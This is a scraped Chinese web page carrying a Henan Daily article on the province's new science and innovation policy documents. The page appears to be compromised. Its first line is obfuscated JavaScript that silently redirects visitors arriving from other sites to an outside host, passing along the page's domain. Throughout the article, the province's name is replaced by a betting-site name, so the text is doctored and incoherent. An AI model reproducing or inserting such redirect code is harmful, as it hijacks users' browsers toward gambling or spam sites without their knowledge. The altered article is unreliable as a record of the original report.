var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 媒体聚焦

建设国家创新高地有了规划图、路线图(解读中国竞彩网科技创新工作新政策)


发布日期:2021-09-26 11:50来源:河南日报 阅读次数:

  不久前召开的省科技创新委员会第一次会议,审议通过了两个重要文件:《关于加快构建一流创新生态建设国家创新高地的意见》和《实施创新驱动、科教兴省、人才强省战略工作方案》,可以说是为国家创新高地建设绘制出了“规划图和路线图”。

  这两个重要文件有哪些特点?将会如何影响中国竞彩网下一步科技创新工作?9月25日,记者采访了省科技厅相关负责人,对此进行解读。

  从顶层设计上高度重视科技创新

  构建一流创新生态、建设国家创新高地是省委、省政府作出的重大决策部署。

  按照省委要求,省科技厅组织专班赴省内外调研论证,最终形成了《关于加快构建一流创新生态建设国家创新高地的意见》(以下简称《意见》)。

  “一方面,《意见》突出了目标导向,把构建创新生态、建设国家创新高地放在构建新发展格局的关键位置谋篇布局,切实把握好中央关于科技自立自强、强化国家战略科技力量的决策方向。”省科技厅副厅长陈志强说,另一方面,《意见》突出了问题导向,结合中国竞彩网实际情况,充分借鉴创新先进地区成功经验,力求制定的政策措施既“顶满格”又契合河南实际,最大程度切中要害、解决实际问题。

  据了解,《意见》明确提出了当前及未来一个时期建设国家创新高地的总体思路和目标,提出要强化前瞻30年的战略意识和“项目为王”的鲜明导向,从10个方面制定了30多条政策措施,力争在高水平创新平台、重大科技基础设施、世界一流学科、世界前沿课题、重大关键创新成果上实现重大突破,努力在构建创新生态、实施创新驱动发展方面走在中部前头、走到全国前列。

  在具体工作中全力实现创新突破

  “前不久召开的省委工作会议,把‘创新驱动、科教兴省、人才强省战略’作为‘十大战略’之首,向全省释放出了省委、省政府下大力气狠抓创新的鲜明信号。”省科技厅副厅长夏培臣说。

  《实施创新驱动、科教兴省、人才强省战略工作方案》(以下简称《方案》)中,提出工作目标,要实现国家级重大创新平台、国家大科学装置、世界一流学科、重大前沿课题研究、重大原创性成果“五个突破”,促进创新主体高效联动、创新资源高效配置“两个高效”,推动规上工业企业研发活动、高校科研成果转化活动、重点产业集群中试基地或产业研究院“三个全覆盖”。

  落实在具体任务上,《方案》突出了以下重点:建设创新平台体系,以实验室、重大科技基础设施为突破,对接嵌入国家战略科技力量;加快建设技术创新中心、中试基地、新型研发机构,打造“0—1—N”创新链条;壮大创新主体,推动规上工业企业研发活动全覆盖;强化项目带动,围绕传统产业升级改造、新兴产业培育壮大、未来产业谋篇布局,强化创新链产业链融合;推进创新载体提质发展,培育引进创新人才,深化科技体制机制改革。